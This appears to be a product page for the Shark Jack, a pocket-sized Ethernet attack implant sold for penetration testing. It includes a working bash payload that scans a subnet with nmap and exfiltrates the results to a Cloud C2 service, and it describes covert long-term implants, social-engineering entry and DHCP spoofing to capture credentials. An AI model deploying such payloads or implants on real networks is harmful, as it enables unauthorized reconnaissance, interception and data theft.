🦈

Shark Jack

Portable Network Attack Tool

Jack into any Ethernet port and instantly run recon, exfiltration, and attack payloads. Pocket-sized, keychain-ready, armed with nmap out of the box. The opportunistic pentester's best friend.

NETWORK RECON PLUG & ATTACK CLOUD CΒ² BASH PAYLOADS NMAP USB-C
Hotplug Attack, Meet LAN

The Shark Jack is a tiny Linux computer disguised as an Ethernet connector. Find an open port on a switch, wall jack, or the back of a workstation β€” plug it in, flip the switch to attack, and the payload fires immediately. The default payload runs an ultra-fast nmap scan of the entire subnet. Recover the results later via SSH or exfiltrate instantly through Cloud CΒ². It's designed for speed: get in, get intel, get out.

~10s
BOOT TO ATTACK
15min
BATTERY RUNTIME
∞
CABLE RUNTIME
Two Editions, One Mission
ORIGINAL
πŸ”‹
Shark Jack (Battery)
Self-contained with internal Li-ion battery. 10–15 minutes of standalone operation. Keychain-sized. Charge via USB-C, deploy anywhere.
βœ“ Internal battery
βœ“ Fully standalone
βœ“ Keychain-portable
βœ“ RGB LED feedback
βœ— No serial console
βœ— Limited runtime
CABLE
πŸ”Œ
Shark Jack Cable
USB-C powered for unlimited runtime. Interactive serial console via USB-C. Connect to laptop, power bank, or even a smartphone for field deployment.
βœ“ Unlimited runtime (USB-C)
βœ“ Serial shell via USB-C
βœ“ Smartphone OTG compatible
βœ“ OTA firmware updates
βœ“ Long-term headless deployment
βœ“ RGB LED feedback
Three Positions, Total Control
⚑
Off / Charge
Device powered down. Charges via USB-C. Blue blink = charging, solid blue = full.
LED: BLUE
πŸ”§
Arming Mode
SSH server at 172.16.24.1. Load payloads, retrieve loot, configure settings.
LED: BLUE BLINK
🦈
Attack Mode
Payload executes immediately. NETMODE assigns network role. LED tracks stages.
LED: PAYLOAD DEFINED
Key Features
β–Έ
Armed Out of the Box β€” Default payload runs an ultra-fast nmap scan of the connected network. Plug in, scan, retrieve results. Zero setup required.
β–Έ
Bash Payload System β€” Standard Bash scripting extended with Hak5 API commands: LED, NETMODE, C2CONNECT, C2EXFIL, SWITCH, BATTERY, SERIAL_WRITE.
β–Έ
Dual Network Modes β€” DHCP_CLIENT joins the target network and receives an IP. DHCP_SERVER assigns IPs to directly connected targets for isolated attacks.
β–Έ
Cloud CΒ² β€” Remote management from anywhere via browser. Exfiltrate loot, deploy payloads, and drop into a full Linux shell β€” all over the web.
β–Έ
RGB LED Feedback β€” Color-coded LED tracks payload stages: SETUP, ATTACK, SPECIAL, CLEANUP, FINISH. Know exactly what's happening at a glance.
β–Έ
Serial Console (Cable) β€” Interactive shell over USB-C. Real-time payload output, live loot access, and OTA updates β€” even from an Android phone.
β–Έ
Full Linux Shell β€” Root access via SSH (arming mode) or serial (Cable). All standard Linux network utilities are pre-installed and ready.
β–Έ
Community Payloads β€” Growing library on GitHub: recon, exfiltration, DHCP spoofing, MITM, reverse shells, and more. Fork, modify, contribute.
Pre-installed Network Tools

The Shark Jack ships with a curated set of Linux network utilities ready to use in payloads or directly from the shell.

nmap
tcpdump
ngrep
wget
curl
python
iptables
arp
ifconfig
netcat
ssh
scp
ip
route
dig
bash
Network Recon + Cloud CΒ² Exfiltration

This payload joins the target network, scans all hosts, saves results locally, and exfiltrates loot to Cloud CΒ² β€” all in under a minute.

#!/bin/bash
# Title: Recon + C2 Exfil
# Description: Scan network, exfiltrate to Cloud CΒ²

# Setup β€” join the target network
LED SETUP
NETMODE DHCP_CLIENT
sleep 5

# Attack β€” scan the subnet
LED ATTACK
SUBNET=$(ip route | awk '/kernel/ {print $1}')
nmap -sP $SUBNET -oN /root/loot/recon_$(date +%s).txt

# Exfiltrate to Cloud CΒ²
LED SPECIAL
C2CONNECT
C2EXFIL /root/loot/*.txt RECON

# Done
LED FINISH
Deployment Scenarios
πŸƒ
Opportunistic Recon
Find an open Ethernet port during a walk-through. Plug in, scan the subnet, pocket the Shark Jack. Review results later via SSH.
🎭
Social Engineering
Gain physical access as a visitor or contractor. The Shark Jack looks like a regular Ethernet adapter β€” plug it into any open wall jack.
πŸ•΅οΈ
Long-Term Implant
Deploy the Cable variant behind a switch with USB power. Continuous runtime, Cloud CΒ² access, and silent data collection for days or weeks.
πŸ—ΊοΈ
Network Mapping
Rapid subnet discovery with nmap. Identify live hosts, open ports, OS fingerprints, and network topology in seconds.
πŸ”“
DHCP Spoofing
Switch to DHCP_SERVER mode and become the network's gateway. Intercept DNS, redirect traffic, or capture credentials.
πŸŽ“
Security Training
Demonstrate why open Ethernet ports are dangerous. Show how quickly a physical network tap leads to full subnet reconnaissance.